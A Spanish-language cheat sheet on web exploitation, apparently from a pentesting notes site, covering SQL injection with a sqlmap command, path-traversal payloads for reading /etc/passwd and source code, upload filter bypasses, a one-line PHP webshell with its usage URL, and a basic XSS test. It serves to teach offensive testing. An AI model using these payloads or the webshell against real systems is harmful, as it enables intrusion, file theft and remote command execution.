Skip to content

🌐 Explotación Web

Ataques dirigidos a aplicaciones web, APIs y servicios HTTP.

💉 SQL Injection (SQLi)

Inyección de código SQL para manipular la base de datos.

Detección

  • Añadir ' o " al final de parámetros URL o inputs.
  • Si ves errores de SQL, es vulnerable.

Herramientas

  • SQLMap:
    bash
    sqlmap -u "http://objetivo.com/item.php?id=1" --dbs

📁 Local File Inclusion (LFI)

Leer archivos del servidor a través de la web.

Payloads Comunes

  • ../../../../etc/passwd
  • ../../../../windows/win.ini
  • PHP Wrapper (Base64): Para leer código fuente sin ejecutarlo. php://filter/convert.base64-encode/resource=config.php

📤 File Upload (RCE)

Subir una shell (webshell) si el servidor no valida bien los archivos.

Bypass de Extensiones

  • Si shell.php está bloqueado, prueba:
    • shell.php5, shell.phtml, shell.php.jpg

Webshells Simples

  • PHP: <?php system($_GET['cmd']); ?>
  • Uso: http://objetivo.com/uploads/shell.php?cmd=whoami

❌ Cross-Site Scripting (XSS)

Ejecutar JavaScript en el navegador de la víctima.

  • Reflejado: El script viaja en la URL.
  • Almacenado: El script se guarda en la BD (comentarios, foros).
  • Payload de prueba: <script>alert(1)</script>

Sin copyright ni nada. Ház lo que quieras con todo esto.